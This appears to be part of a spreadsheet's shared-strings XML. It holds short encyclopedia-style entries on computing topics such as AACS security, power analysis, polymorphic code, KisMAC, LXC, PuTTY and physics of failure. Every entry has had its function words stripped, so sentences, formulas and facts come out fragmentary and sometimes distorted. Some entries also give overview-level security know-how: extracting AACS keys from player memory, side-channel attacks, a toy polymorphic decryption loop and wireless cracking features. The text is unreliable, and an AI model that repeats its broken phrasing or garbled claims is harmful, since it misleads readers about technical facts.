    <t>prey software online platform mobile device tracking, management, protection available laptops, tablets, mobiles. software service developed chilean company prey inc., successor funding company fork ltd. prey originally created developer tomás pollak together carlos yaconi, current company, founded fork ltd. released first version prey linux. functioning prey started anti-theft software recovering lost mobile devices evolved remote management device data protection. service works client, application, installed devices protected. company prey inc. private software development company. currently, operates offices francisco santiago chile. features main feature platform location tracking supported devices, active monitoring device movement. service also automatic reactions location triggers, unwanted movements, trigger security actions instantly event detected. provides features give user remote security capabilities case theft loss. remotely recover wipe information lost stolen devices. tools streamline management processes maintain device inventory global monitoring. evidence generation tool device recovery. source code source code prey's agents, applications, open source code general public license (gplv3). online platform's code infrastructure private property prey inc. versions first version agent released originally linux march 2009 microsoft windows april 2009. currently, prey available laptops, tablets mobiles macos, windows, linux, android, operating systems. references external links official website interview tomás pollak prey github</t>
  </si>
  <si>
    <t>PlateSpin</t>
  </si>
  <si>
    <t>platespin software suite micro focus international. originally standalone software company headquartered toronto, canada, registered delaware, platespin inc. founded robert reive 1999 co-founders added later david richards, bruno baloi verdun. intel corp. intel64fund investor, along 4quarters capital, castlehill ventures(barry laver) altamira, latter three toronto, canada. original product patent filed platespin operations center, first usable provisioning tool cost deployment servers vmware 64bit processors. platespin operations centre designed reduce operations cost efficiently resources large servers, well deal routine security patches software servers efficiently. today platespin netiq suite software helps manage physical virtualized server workloads vmware, microsoft hyper-v, kvm, citrix xenserver, amazon services microsoft azure. history after 9/11 financial meltdown, platespin's immediate market opportunity shrank rapidly, large early customer opportunity budgets frozen, result team disbanded major interests feb, 2003 placed receivership. first company awards 2003 award giga research "most promising technology category: software server provisioning". later re-formed stephen pollack march, 2003 receivership ontario, canada ltd. numbered company platespin name. members original software development, packaging business development team rehired refocus previously created platespin's product line value narrower market focus, converting physical servers virtual servers vmware powerp2v later powerconvert label. platespin created additional products platespin powerrecon statistically analyze data center help prepare consolidation platespin forge, disaster recovery solution. re-worked company rapidly grow $25m five years platespin's reseller/integrator channel networks. over years platespin, company reached milestone 10,000 customers worldwide reached global headcount employees. february 2008, novell announced entered definitive agreement acquire platespin ltd. million usd. march 2008, novell announced completed acquisition platespin, would "become part novell systems resource management business unit continue develop market solutions global customer base."on 2011, attachmate announced transferred platespin products novell business unit netiq business unit.in november 2014, attachmate completed merger micro focus international (lon: mcro), global enterprise infrastructure software company headquartered newbury, united kingdom. part continued operations streamlining, micro focus closed toronto, canada office platespin moved remaining north american operations united states. products platespin solutions manage physical virtualized server workloads vmware, microsoft hyper-v, citrix xenserver. platespin recon (formerly powerrecon) enables system administrators inventory physical virtual servers, catalog resources like type, amount ram, disk storage, etc. platespin recon also monitor utilization resources time, create "profiles" used facilitate server consolidation initiatives. support ended platespin migrate (formerly powerconvert) allows system administrators migrate workloads physical virtual servers order match workload machine best suited job. support discontinued september 2021 platespin protect (formerly powerconvert) allows system administrators protect physical virtual workloads creating maintaining virtual machine copies disaster recovery business continuity purposes. discontinued support ended august 2019 platespin forge hardware appliance allows system administrators protect physical virtual workloads leveraging embedded virtualization. platespin forge includes software, hardware, storage needed deploy simple disaster recovery solution. discontinued support ended august 2019 platespin transformation manager helps enterprises, service providers, systems integrators plan track large-scale data center transformation projects across physical, virtual, cloud infrastructures. support discontinued june 2022 references external links netiq's website micro focus' website micro focus product lifecycle</t>
  </si>
  <si>
    <t>Key clustering</t>
  </si>
  <si>
    <t>hash function avoid clustering, mapping keys consecutive slots. such clustering cause lookup cost skyrocket, even load factor collisions infrequent. popular multiplicative hash claimed particularly poor clustering behaviour. references</t>
  </si>
  <si>
    <t>Security of Advanced Access Content System</t>
  </si>
  <si>
    <t>security advanced access content system (aacs) subject discussion amongst security researchers, high definition video enthusiasts, consumers large since inception. successor content scramble system (css), digital rights management mechanism used commercial dvds, aacs intended improve upon design addressing flaws total circumvention 1999. aacs system relies subset difference tree combined certificate revocation mechanism ensure security high definition video content event compromise. even aacs use, security researchers expressed doubts system's ability withstand attacks. comparison aacs history attacks aacs proposal voted technologies likely fail ieee spectrum magazine's readers january 2005 issue. concerns approach included similarity past systems failed, css, inability preserve security attacks compromise large numbers players. lech johansen, part team circumvented css, said expected aacs cracked 2006 beginning 2007.in late 2006, security expert peter gutmann released cost analysis windows vista content protection", technical paper criticizing implementation various content protection technologies windows vista. providing protection incurs considerable costs terms system performance, system stability, technical support overhead, hardware software cost. these issues affect users vista entire industry, since effects protection measures extend cover hardware software ever come contact vista, even used directly vista (for example hardware macintosh computer linux server). microsoft later claimed paper contained various factual errors.while great care taken aacs ensure content encrypted along entire path disc display device, discovered july 2006 perfect copy still frame film could captured certain blu-ray software players using print screen function windows operating system. suggested approach could automated allow perfect copy entire film made, much films copied cracked, date copy discovered. this exploit closed subsequent software versions. such approaches constitute compromises aacs encryption itself, relying instead officially licensed software player perform decryption. such, output data form compressed video disc, rather decompressed video. this example analog hole. both title keys keys used decrypt (known processing keys aacs specifications) found using debuggers inspect memory space running hd-dvd blu-ray player programs. hackers also found device keys, used calculate processing key, host private signed aacs used hand-shaking host drive; required reading volume id). first unprotected movies appeared bittorrent trackers soon afterwards. processing first media block version, could used decrypt aacs protected content released point, found published internet doom9 forums. aacs licensing authority sent multiple dmca takedown notices sites hosting key. some administrators sites consist user-submitted content, digg wikipedia, tried remove mentions fearing reprisals aacs both sites' administrators eventually decided allow publication key. cyberlink, company sells powerdvd player, stated software could used part exploits.on april 2007, aacs consortium announced revoked device keys used cyberlink powerdvd intervideo windvd, patches made available users provided uncompromised encryption keys better security keys. continue ability view content users forced apply patches, also hardened security player applications. 2007 processing next version media block posted comments page freedom tinker blog post.the encryption offer true protection memory snooping, since software player must encryption available somewhere memory protect determined owner extracting encryption everything else fails user could program virtual machine making possible freeze program inspect memory addresses without program knowing). wholly prevent attacks like would require changes platform (see trusted computing) content distributors permit content played providing companies making software players needed encryption keys). january 2007 website launched hdkeys.com containing database title keys. also featured modified copy backuphddvd software allowing online retrieval (the latter later removed dmca complaint). slysoft released anydvd allows users watch blu-ray movies non-hdcp-compliant hardware. movies decrypted directly disc, copied another medium. anydvd also capable automatically removing unwanted logos trailers. slysoft stated anydvd uses several different mechanisms disable encryption, dependent compromised encryption keys. they also stated aacs even flaws implementation css; renders highly vulnerable, release details implementation. users doom9 claim program makes host certificate powerdvd version 6.5, slysoft claimed program would unaffected aacs revocation system. media block renewals references</t>
  </si>
  <si>
    <t>Power analysis</t>
  </si>
  <si>
    <t>power analysis form side channel attack attacker studies power consumption cryptographic hardware device. these attacks rely basic physical properties device: semiconductor devices governed laws physics, dictate changes voltages within device require small movements electric charges (currents). measuring currents, possible learn small amount information data manipulated. simple power analysis (spa) involves visually interpreting power traces, graphs electrical activity time. differential power analysis (dpa) advanced form power analysis, allow attacker compute intermediate values within cryptographic computations statistical analysis data collected multiple cryptographic operations. introduced open cryptography community 1998 paul kocher, joshua jaffe benjamin jun. background cryptography, side channel attack used extract secret data secure device (such smart card, tamper-resistant "black box", integrated circuit). side-channel analysis typically trying non-invasively extract cryptographic keys secret information device. simple example german tank problem: serial numbers tanks provide details production data tanks. physical security, non-invasive attack would similar lock-picking, successful attack leaves trace attacker present. simple power analysis simple power analysis (spa) side-channel attack involves visual examination graphs current used device time. variations power consumption occur device performs different operations. example, different instructions performed microprocessor differing power consumption profiles. codeflow depends secret value thus leak code-flow power consumption monitoring (and thus also leak secret value). simple example, consider password check follows: this password check potentially contains timing attack, since execution time constant. function output user exploitable result however, example could compensating delay response returned. observing power consumption make clear number loops executed. similarly, squaring multiplication operations implementations often distinguished, enabling adversary compute secret key. even magnitude variations power consumption small, standard digital oscilloscopes easily show data-induced variations. frequency filters averaging functions (such built oscilloscopes) often used filter high-frequency components. differential power analysis differential power analysis (dpa) side-channel attack involves statistically analyzing power consumption measurements cryptosystem. attack exploits biases varying power consumption microprocessors hardware performing operations using secret keys. attacks signal processing error correction properties extract secrets measurements contain much noise analyzed using simple power analysis. using dpa, adversary obtain secret keys analyzing power consumption measurements multiple cryptographic operations performed vulnerable smart card device. high-order differential power analysis high-order differential power analysis (ho-dpa) advanced form attack. ho-dpa enables multiple data sources different time offsets incorporated analysis. ho-dpa less widely practiced dpa, analysis complex vulnerable devices broken easily dpa. power analysis algorithmic security power analysis provides "see inside" otherwise 'tamperproof' hardware. example, des's schedule involves rotating 28-bit registers. many implementations check least significant device shifts register right prepends left end. zero, register shifted right without prepending power analysis distinguish processes, enabling adversary determine bits secret key. implementations algorithms triple believed mathematically strong trivially breakable using power analysis attacks. result, power analysis attacks combine elements algorithmic cryptanalysis implementation security. standards practical security concerns applications devices fall physical possession adversary, protection power analysis generally major design requirement. power analyses also reportedly used conditional access modules used television systems.the equipment necessary performing power analysis attacks widely available. example, digital storage oscilloscopes provide necessary data collection functionality, data analysis typically performed using conventional pcs. commercial products designed testing labs also available. open-source chipwhisperer project first complete toolchain open-source hardware software power analysis experiments. preventing simple differential power analysis attacks power analysis attacks cannot generally detected device, since adversary's monitoring normally passive. addition, attack non-invasive. result, physical enclosures, auditing capabilities, attack detectors ineffective. instead, cryptosystem engineers must ensure devices' power variations reveal information usable adversaries. simple power analysis easily distinguish outcome conditional branches execution cryptographic software, since device different things (consuming different power) depending whether conditional branch taken. reason, care taken ensure secret values affect conditional branches within cryptographic software implementations. other sources variation, microcode differences, branches introduced compilers, power consumption variations multipliers, also commonly lead vulnerabilities. differential power analysis difficult prevent, since even small biases power consumption lead exploitable weaknesses. some countermeasure strategies involve algorithmic modifications cryptographic operations occur data related actual value mathematical relationship survives cryptographic operation. approach involves blinding parameters randomize value. other countermeasure strategies reduce effectiveness attacks involve hardware modifications: varying chip internal clock frequency considered desynchronize electric signals, lead return algorithmic enhancements traditional dpa. patents many techniques prevent attacks proposed academic literature. while public systems like typically protected exploiting properties underlying algebraic structures case would multiplicatively homomorphic property), symmetrically keyed primitives like blockciphers require different methods, e.g., "masking". some companies, like rambus claim intellectual property defense mechanisms. references</t>
  </si>
  <si>
    <t>LXC</t>
  </si>
  <si>
    <t>linux containers (lxc) operating-system-level virtualization method running multiple isolated linux systems (containers) control host using single linux kernel. linux kernel provides cgroups functionality allows limitation prioritization resources (cpu, memory, block i/o, network, etc.) without need starting virtual machines, also namespace isolation functionality allows complete isolation application's view operating environment, including process trees, networking, user mounted file systems.lxc combines kernel's cgroups support isolated namespaces provide isolated environment applications. early versions docker used container execution driver, though made optional v0.9 support dropped docker v1.10. references linux containers commonly refer docker containers running linux. overview provides operating system-level virtualization virtual environment process network space, instead creating full-fledged virtual machine. relies linux kernel cgroups functionality released version 2.6.24. also relies kinds namespace isolation functionality, developed integrated mainline linux kernel. security originally, containers secure os-level virtualization methods openvz: linux kernels 3.8, root user guest system could arbitrary code host system root privileges, chroot jails. starting release, possible containers regular users host using "unprivileged containers". unprivileged containers limited cannot access hardware directly. however, even privileged containers provide adequate isolation security model, properly configured. alternatives similar os-level virtualization technologies linux openvz linux-vserver, well operating systems freebsd jails, workload partitions solaris containers. contrast openvz, works vanilla linux kernel requiring additional patches applied kernel sources. version lxc, released february 2014, long-term supported version intended supported five years. long-term support releases: supported june 2021; supported june 2023. alternative linux container manager. built aims provide better user experience. also open container initiative container linux (formerly coreos linux) docker, project automating deployment applications inside software containers apache mesos, large-scale cluster management platform based container isolation operating system-level virtualization implementations proxmox virtual environment, open-source server virtualization management platform supporting containers anbox, uses execute android applications linux distributions references external links</t>
  </si>
  <si>
    <t>Polymorphic code</t>
  </si>
  <si>
    <t>computing, polymorphic code code uses polymorphic engine mutate keeping original algorithm intact code changes every time runs, function code (its semantics) change all. example, simple math equations achieve result, different machine code cpu. this technique sometimes used computer viruses, shellcodes computer worms hide presence.encryption common method hide code. with encryption, main body code (also called payload) encrypted appear meaningless. code function before, decryption function added code. when code executed, function reads payload decrypts executing turn. encryption alone polymorphism. gain polymorphic behavior, encryptor/decryptor pair mutated copy code. this allows different versions code function same. malicious code most anti-virus software intrusion detection systems (ids) attempt locate malicious code searching computer files data packets sent computer network. security software finds patterns correspond known computer viruses worms, takes appropriate steps neutralize threat. polymorphic algorithms make difficult software recognize offending code constantly mutates. malicious programmers sought protect encrypted code virus-scanning strategy rewriting unencrypted decryption engine (and resulting encrypted payload) time virus worm propagated. anti-virus software uses sophisticated pattern analysis find underlying patterns within different mutations decryption engine, hopes reliably detecting malware. emulation used defeat polymorphic obfuscation letting malware demangle virtual environment utilizing methods, traditional signature scanning. such virtual environment sometimes called sandbox. polymorphism protect virus emulation decrypted payload remains regardless variation decryption algorithm. metamorphic code techniques used complicate detection further, virus execute without ever identifiable code blocks memory remains constant infection infection. first known polymorphic virus written mark washburn. virus, called 1260, written 1990. better-known polymorphic virus created 1992 hacker dark avenger means avoiding pattern recognition antivirus software. common virulent polymorphic virus file infecter virut. example this example really polymorphic code serve introduction world encryption operator. example, algorithm using variables variable could large amount code changes would effect algorithm itself, allowing changed endlessly without heed final product start: goto decryption_code encrypted: ...lots encrypted code... decryption_code: encrypted loop: 3214 cryptokey goto loop decryption_code goto encrypted cryptokey: some_random_number encrypted code payload. make different versions code, copy garbage lines manipulate change. code inside "encrypted" ("lots encrypted code") search code decryption_code cryptokey algorithm code thing. usually, coder uses zero (for example; first generation virus, making easier coder code encrypted. coder implements incremental algorithm random one. polymorphic encryption polymorphic code also used generate encryption algorithm. this code generated online service stringencrypt. takes string file content encrypts random encryption commands generates polymorphic decryption code many supported programming languages: example, string encrypted character stored encrypted form using unicode widechar format. different encryption commands used like bitwise xor, not, addition, subtraction, rotations. everything randomized, encryption keys, rotation counters encryption commands order well. output code generated c/c++, java, javascript, python, ruby, haskell, masm, fasm autoit. thanks randomization generated algorithm different every time. it's possible write generic decryption tools compiled code polymorphic encryption code analyzed time re-encrypted. some tools polymorphic encryption data privacy, running multiple encryption algorithms break sensitive data usable components. this allows users generate large sets data without decrypting them. also timeline notable computer viruses worms metamorphic code self-modifying code alphanumeric shellcode shellcode software cracking security cracking obfuscated code oligomorphic code references</t>
  </si>
  <si>
    <t>PuTTY</t>
  </si>
  <si>
    <t>putty free open-source terminal emulator, serial console network file transfer application. supports several network protocols, including scp, ssh, telnet, rlogin, socket connection. also connect serial port. name "putty" official meaning.putty originally written microsoft windows, ported various operating systems. official ports available unix-like platforms, work-in-progress ports classic macos, unofficial ports contributed platforms symbian, windows mobile windows phone. putty written maintained primarily simon tatham, british programmer. features putty supports many variations secure remote terminal, provides user control encryption protocol version, alternate ciphers aes, 3des, rc4, blowfish, des, public-key authentication. putty uses format files (protected message authentication code). putty supports gssapi, including user provided gssapi dlls. also emulate control sequences xterm, vt220, vt102 ecma-48 terminal emulation, allows local, remote, dynamic port forwarding (including forwarding). network communication layer supports ipv6, protocol supports zlib@openssh.com delayed compression scheme. also used local serial port connections. putty comes bundled command-line sftp clients, called "pscp" "psftp" respectively, plink, command-line connection tool, used non-interactive sessions.putty support session tabs directly, many wrappers available history putty development began late 1998, usable ssh-2 client october 2000. components putty consists several components: putty telnet, rlogin, client itself, also connect serial port pscp client, i.e. command-line secure file copy. also sftp perform transfers psftp sftp client, i.e. general file transfer sessions much like puttytel telnet-only client plink command-line interface putty back ends. usually used tunneling pageant authentication agent putty, pscp plink puttygen rsa, dsa, ecdsa eddsa generation utility pterm (unix version only) client supports terminal emulation putty also comparison clients tera term mintty winscp references external links official website</t>
  </si>
  <si>
    <t>KisMAC</t>
  </si>
  <si>
    <t>kismac wireless network discovery tool wide range features, similar kismet (its linux/bsd namesake). program geared toward network security professionals, novice-friendly similar applications. distributed general public license, kismac free software. kismac scan networks passively supported cards including apple's airport, airport extreme, many third-party cards, actively card supported itself. cracking keys, brute force, exploiting flaws weak scheduling badly generated keys supported card capable monitor mode used, packet reinjection done supported card (prism2 ralink cards). mapping performed nmea compatible receiver attached.kismac2 fork original software gui, features works 10.7 10.10, 64-bit only. longer maintained. data also saved pcap format loaded programs wireshark. kismac features reveals hidden cloaked closed ssids shows logged clients (with addresses, addresses signal strengths) mapping support draw area maps network coverage pcap import export support 802.11b/g different attacks encrypted networks deauthentication attacks applescript-able kismet drone support (capture kismet drone) kismac germany project created michael rossberg july 2007, removed project changes german (specifically, stgb section 202c) "prohibits production distribution security software". date, project lead passed geoffrey kruse, maintainer kismac since 2003, active developer since 2001. kismac longer actively developed. primary development, relocated kismac site offline september 2016. august 2007, former homepage denounces german law. kismac2 project continue development longer maintained well. also aircrack-ng istumbler kismet netspot wifi explorer references external links binaries latest versions former homepage kismac kismac2, currently maintained fork original project</t>
  </si>
  <si>
    <t>Security-focused operating system</t>
  </si>
  <si>
    <t>this list operating systems specifically focused security. operating systems general-purpose usage secure without specific focus security.similar concepts include security-evaluated operating systems achieved certification auditing organization, trusted operating systems provide sufficient support multilevel security evidence correctness meet particular requirements. linux android-based calyxos free open source privacy security focused android custom divestos free open source privacy security focused android custom grapheneos open source privacy security focused android custom kali nethunter free open source kali linux based android custom penetration testing debian-based subgraph linux-based operating system designed resistant surveillance interference sophisticated adversaries internet. subgraph designed features reduce attack surface operating system, increase difficulty required carry certain classes attack. this accomplished system hardening proactive, ongoing focus security attack resistance. subgraph also places emphasis ensuring integrity installed software packages deterministic compilation. subgraph features kernel hardened grsecurity patchset, linux namespaces, xpra application containment, mandatory file system encryption using luks, resistance cold boot attacks, configured default isolate network communications installed applications independent circuits anonymity network. tails security-focused linux distribution aimed preserving privacy anonymity. meant live-cd drive write kind data drive, unless specified persistence set. that way, lives everything purged system whenever powered off. tails designed emergency shutdown erase data medium resides expelled. whonix anonymous general purpose operating system based virtualbox, debian linux tor. whonix design, leaks impossible. even malware superuser find user's real address/location. this whonix consists (virtual) machines. machine solely runs acts gateway, called whonix-gateway. machine, called whonix-workstation, completely isolated network. also possible multiple whonix workstations simultaneously gateway, provide stream isolation (though necessarily endorsed). connections forced whonix gateway virtual machine, therefore leaks impossible. fedora-based qubes desktop operating system based around hypervisor allows grouping programs number isolated sandboxes (virtual machines) provide security. windows programs running within sandboxes ("security domains") color coded easy recognition. security domains configurable, transient (changes file system preserved), network connection routed special virtual machines (for example provides networking). operating system provides secure mechanisms copy paste copying files security domains gentoo-based pentoo live live designed penetration testing security assessment. based gentoo linux, pentoo provided 64-bit installable live built hardened gentoo linux including hardened kernel toolchain. linux derived hardened gentoo linux. aims provide secure, stable, fast desktop environment lives purely ram. other linux distributions alpine linux actively maintained lightweight musl busybox-based distribution. uses grsecurity patches default kernel compiles packages stack-smashing protection. annvix originally forked mandriva provide security-focused server distribution employs propolice protection, hardened configuration, small footprint. there plans include full support rsbac mandatory access control system. annvix dormant, however, last version released december 2007. engarde secure linux secure platform designed servers. browser-based tool using selinux since 2003. additionally, accompanied web, dns, email enterprise applications, specifically focusing security without unnecessary software. community platform engarde secure linux bleeding-edge version freely available download. immunix commercial distribution linux focused heavily security. they supplied many systems making, including stackguard; cryptographic signing executables; race condition patches; format string exploit guarding code. immunix traditionally releases older versions distribution free non-commercial use. immunix distribution licensed licenses: immunix commercial non-commercial licenses. many tools within gpl, however, kernel. solar designer's openwall project (owl) first distribution non-executable userspace stack, /tmp race condition protection, access control restrictions /proc data, kernel patch. also features per-user directory pam_mktemp module, supports blowfish password encryption. bsd-based trustedbsd sub-project freebsd designed trusted operating system extensions, targeting common criteria information technology security evaluation (see also orange book). main focuses working access control lists, event auditing, extended attributes, mandatory access controls, fine-grained capabilities. since access control lists known confronted confused deputy problem, capabilities different avoid issue. part trustedbsd project, also port nsa's flask/te implementation freebsd. many trusted extensions integrated main freebsd branch starting 5.x. openbsd research operating system developing security mitigations. selinux module security-enhanced linux (selinux) module incorporated linux distribution. object-capability systems these operating systems engineered around object-capabilities security paradigm. instead system deciding access request granted, bundling authority designation decides. capros eros genode fiasco.oc keykos sel4 solaris-based trusted solaris security-focused version solaris unix operating system. aimed primarily government computing sector, trusted solaris adds detailed auditing tasks, pluggable authentication, mandatory access control, additional physical authentication devices, fine-grained access control. trusted solaris common criteria certified. recent version, trusted solaris (released 2000), received eal4 certification level augmented number protection profiles. telnet vulnerable buffer overflow exploits patched april 2001. also references</t>
  </si>
  <si>
    <t>Jumper (computing)</t>
  </si>
  <si>
    <t>electronics particularly computing, jumper short length conductor used close, open bypass part electronic circuit. they typically used configure printed circuit boards, motherboards computers. process setting jumper often called strapping.a strapping option hardware configuration setting usually sensed power-up bootstrapping device even single chip). design jumper pins (points connected jumper) arranged groups called jumper blocks, group least pair contact points. appropriately sized conductive sleeve called jumper, technically, shunt jumper, slipped pins complete circuit. two-pin jumper allows choose boolean states, whereas three-pin jumper allows select three states. jumpers must electrically conducting; usually encased non-conductive block plastic convenience. this also avoids risk unshielded jumper accidentally short something critical (particularly dropped live circuit). jumper shunts categorized pitch (uniform distance pins measured center center). some common pitches are: 2.54 (0.100 2.00 (0.079 1.27 (0.050 when jumper placed jumper pins, electrical connection made them, equipment thus instructed activate certain settings accordingly. example, older systems, speed voltage settings often made setting jumpers. some documentation refer setting jumpers off, closed, open. when jumper covering least pins closed jumper, jumper off, covering pin, pins jumper open jumper. jumperless designs advantage usually fast easy often require little technical knowledge, adjusted without physical access circuit board. with pcs, common jumpers setting operating mode drives (master, slave, cable select), though declining rise sata drives. jumpers used since beginning printed circuit boards. permanent parts circuit some printed wiring assemblies, particularly using single-layer circuit boards, include short lengths wire soldered pairs points. these wires called wire bridges jumpers, unlike jumpers used configuration settings, intended permanently connect points question. they used solve layout issues printed wiring, providing connections would otherwise require awkward cases, impossible) routing conductive traces. cases resistor ohms used instead wire, installed robotic assembly machines install real resistors components. jumpers setting configuration options normally meant user-configurable also implemented solder jumpers, typically more) pads positioned closely together even interwoven shapes. typically non-conductive default easily changed closed connection deliberately placed solder bridge them. closed state default state, designer superimpose thin trace, would (with knife) open jumper. also switch jump wire header fuse busbar references external links jumper settings archive wayback machine (archived 2007-10-11)</t>
  </si>
  <si>
    <t>LPAR2RRD</t>
  </si>
  <si>
    <t>lpar2rrd open-source software tool used monitoring reporting performance servers, clouds databases. developed czech company xorux. overview lpar2rrd open-source software published general public license v3.0. april 2022, latest version 7.40. software first launched 2006.the software tool designed monitor report server virtualization utilizations. produces utilization graphs, reports, alerts physical virtual servers cpu, memory, iops, many depending specific virtualization platform. also supports database engines oracle database, postgresql containerization platforms like openshift docker. cloud technologies supported well. software compatible various systems power systems, vmware, nutanix, oracle oracle solaris, ovirt virtualization, xenserver, microsoft hyper-v, linux, oracle database, postgresql database, microsoft server, amazon services, microsoft azure, google cloud, apache cloudstack, kubernetes, openshift, docker, huawei fusioncompute, proxmox. references external links official website demo github sourceforge</t>
  </si>
  <si>
    <t>LM-X License Manager</t>
  </si>
  <si>
    <t>lm-x license manager license management tool protects software products piracy. used independent software vendors (isv) implement software asset management practices. related monitoring usage existing applications adding licenses wherever requested end-. control license policies externally applications, enforce various levels security. lm-x software license manager number platforms including windows, linux, features system clock check automatic server discovery manual automatic heartbeats license borrowing grace licensing license replacement web-based license management also copy protection digital rights management floating licensing license borrowing list license managers product activation references https://www.itassetmanagement.net/wp-content/uploads/2015/02/itam_a4whitepaper_softwareassetmanagement_unlocked.pdf external links official page</t>
  </si>
  <si>
    <t>Physics of failure</t>
  </si>
  <si>
    <t>physics failure technique practice reliability design leverages knowledge understanding processes mechanisms induce failure predict reliability improve product performance. other definitions physics failure include: science-based approach reliability uses modeling simulation design-in reliability. helps understand system performance reduce decision risk design equipment fielded. this approach models root causes failure fatigue, fracture, wear, corrosion. approach design development reliable product prevent failure, based knowledge root cause failure mechanisms. physics failure (pof) concept based understanding relationships requirements physical characteristics product variation manufacturing processes, reaction product elements materials loads (stressors) interaction loads influence fitness respect conditions time. overview concept physics failure, also known reliability physics, involves degradation algorithms describe physical, chemical, mechanical, thermal, electrical mechanisms evolve time eventually induce failure. while concept physics failure common many structural fields, specific branding evolved attempt better predict reliability early generation electronic parts systems. beginning within electronics industry, major driver implementation physics failure poor performance military weapon systems world during subsequent decade, united states department defense funded extensive amount effort especially improve reliability electronics, initial efforts focused after-the-fact statistical methodology. unfortunately, rapid evolution electronics, designs, materials, manufacturing processes, tended quickly negate approaches predictions derived older technology. addition, statistical approach tended lead expensive time-consuming testing. need different approaches birth physics failure rome development center (radc). under auspices radc, first physics failure electronics symposium held september 1962. goal program relate fundamental physical chemical behavior materials reliability parameters. early history integrated circuits initial focus physics failure techniques tended limited degradation mechanisms integrated circuits. this primarily rapid evolution technology created need capture predict performance several generations ahead existing product. first major successes predictive physics failure formula developed james black motorola describe behavior electromigration. electromigration occurs collisions electrons cause metal atoms conductor dislodge move downstream current flow (proportional current density). black used knowledge, combination experimental findings, describe failure rate electromigration {\displaystyle mttf=a(j^{-n})e^{\frac {ea}{kt}}} constant based cross-sectional area interconnect, current density, activation energy (e.g. grain boundary diffusion aluminum), boltzmann constant, temperature scaling factor (usually according black). physics failure typically designed predict wearout, increasing failure rate, initial success black focused predicting behavior operational life, constant failure rate. this electromigration traces designed following design rules, electromigration vias primarily interfacial effects, tend defect process-driven. leveraging success, additional physics-of-failure based algorithms derived three major degradation mechanisms (time dependent dielectric breakdown [tddb], carrier injection [hci], negative bias temperature instability [nbti]) modern integrated circuits (equations shown below). more recent work attempted aggregate discrete algorithms system-level prediction.tddb: τo(t) exp[ g(t)/ εox] τo(t) 5.4*10-7 exp(-ea kt), g(t) 5.8/kt, permittivity. hci: λhci exp(-β/vd)exp(-ea λhci failure rate hci, empirical fitting parameter, empirical fitting parameter, drain voltage, activation energy hci, typically −0.2 −0.1ev, boltzmann's constant, temperature kelvin. nbti: εoxm vtμp exp( determined empirically normalizing equation, 2.9, thermal voltage, surface mobility constant, activation energy nbti, boltzmann's constant, temperature kelvin next stage electronic packaging resources successes integrated circuits, review drivers field failures, subsequently motivated reliability physics community initiate physics failure investigations package-level degradation mechanisms. extensive amount work performed develop algorithms could accurately predict reliability interconnects. specific interconnects interest resided level (wire bonds, solder bumps, attach), level (solder joints), level (plated holes). just integrated circuit community four major successes physics failure die-level, component packaging community four major successes arise work 1970s 1980s. these peck: predicts time failure wire bond bond connections exposed elevated temperature humidity {\displaystyle ttf=a_{0}(rh)^{-2.7}f(v)\exp \left({\frac {e_{a}}{k_{b}t}}\right)} constant, relative humidity, f(v) voltage function (often cited voltage squared), activation energy, boltzmann's constant, temperature kelvin. engelmaier: predicts time failure solder joints exposed temperature cycling leadless {\displaystyle n_{f}(50\%)={\frac {1}{2}}\left[{\frac {2\epsilon '_{f}}{\delta d}}\right]^{\frac {-1}{c}}\quad \delta d({\text{leadless}})=\left[{\frac {fl_{d}\delta (\alpha \delta t)}{h}}\right]} fatigue ductility coefficient, time temperature dependent constant, empirical constant, distance neutral point, coefficient thermal expansion, change temperature, solder joint thickness. steinberg: predicts time failure solder joints exposed vibration 0.00022 {\displaystyle z_{0}={\frac {9.8\times 3{\sqrt {\pi /2\times psd\times f_{n}\times q}}}{f_{n}^{2}}}\quad z_{c}={\frac {0.00022b}{chr{\sqrt {l}}}}} maximum displacement, power spectral density (g2/hz), natural frequency cca, transmissibility (assumed square root natural frequency), critical displacement million cycles failure), length edge parallel component located center board, component packaging constant, thickness, relative position factor, component length. ipc-tr-579: predicts time failure plated holes exposed temperature cycling {\displaystyle \sigma ={\frac {(\alpha _{e}-\alpha _{cu})\delta ta_{e}e_{e}e_{cu}}{a_{e}e_{e}+a_{cu}e_{cu}}},\quad {\text{for }}\sigma \leq s_{y}} 0.75 0.36 0.1785 {\displaystyle n_{f}^{-0.6}d_{f}^{0.75}+0.9{\frac {s_{u}}{e}}\left[{\frac {\exp(d_{f})}{0.36}}\right]^{0.1785\log {\frac {10^{5}}{n_{f}}}}-\delta \epsilon coefficient thermal expansion (cte), temperature, elastic modules, board thickness, hole diameter, plating thickness, correspond board copper properties, respectively, ultimate tensile strength ductility plated copper, strain range. each equations uses combination knowledge degradation mechanisms test experience develop first-order equations allow design reliability engineer able predict time failure behavior based information design architecture, materials, environment. recent work more recent work area physics failure focused predicting time failure materials (i.e., lead-free solder, high-k dielectric software programs, using algorithms prognostic purposes, integrating physics failure predictions system-level reliability calculations. limitations there limitations physics failure design assessments reliability prediction. first physics failure algorithms typically assume ‘perfect design’. attempting understand influence defects challenging often leads physics failure (pof) predictions limited life behavior opposed infant mortality useful operating life). addition, companies many environments (think personal computers) performing assessment potential combination temperature vibration humidity power cycling etc. would onerous potentially limited value. also list finite element software packages critical plane analysis maintainability references</t>
  </si>
  <si>
    <t>Key checksum value</t>
  </si>
  <si>
    <t>cryptography, checksum value (kcv) checksum cryptographic key. used validate integrity compare keys without knowing actual values. computed encrypting block bytes, value '00' '01', cryptographic retaining first hexadecimal characters encrypted result. used management different ciphering devices, like sim-cards hardware security modules (hsm). globalplatform technical specifications defined des/3des keys follows: key, check value computed encrypting bytes, value '00', checked retaining highest-order bytes encrypted result. key, check value computed encrypting bytes, value '01', checked retaining highest-order bytes encrypted result. definition used gsma. references</t>
  </si>
  <si>
    <t>KAME project</t>
  </si>
  <si>
    <t>kame project, sub-project wide project, joint effort organizations japan aimed provide free ipv6 ipsec (for ipv4 ipv6) protocol stack implementation variants unix computer operating-system. project began 1998 november 2005 announced project would finished march 2006. name kame short version karigome, location project's offices beside keio university sfc.kame project's code based "wide hydrangea" ipv6/ipsec stack wide project. following organizations participated project: alaxala networks corporation fujitsu, ltd. hitachi, ltd. internet initiative japan inc. keio university corporation university tokyo toshiba corporation yokogawa electric corporationfreebsd, netbsd dragonfly integrated ipsec ipv6 code kame project; openbsd integrated ipv6 code rather (having developed ipsec stack). linux also integrated code project native ipsec implementation.the kame project collaborated tahi project (which develops provides verification-technology ipv6), usagi project wide project. racoon racoon, kame's user-space daemon, handles internet exchange (ike). linux systems forms part ipsec-tools package. references external links official website</t>
  </si>
  <si>
    <t>PowerVM</t>
  </si>
  <si>
